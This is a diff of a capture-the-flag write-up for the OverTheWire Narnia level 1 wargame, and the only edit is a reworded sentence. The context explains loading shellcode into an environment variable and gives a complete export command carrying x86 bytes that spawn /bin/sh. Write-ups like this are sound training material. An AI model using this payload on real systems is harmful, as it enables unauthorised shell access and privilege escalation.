CyberSocYork/OverTheWire_Write-ups/Narnia/Narnia_Level_01.md

 To change this from just being a string we need to find something that can print our shellcode into its executable format.
 To do this we can use python.

-Python can be used to print our shellcode into the environment variable which makes it executable.
+Python can be used to print our shellcode into the environment variable which will make it executable.

 The new command becomes:
  `export EGG=$(python -c ‘print “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')`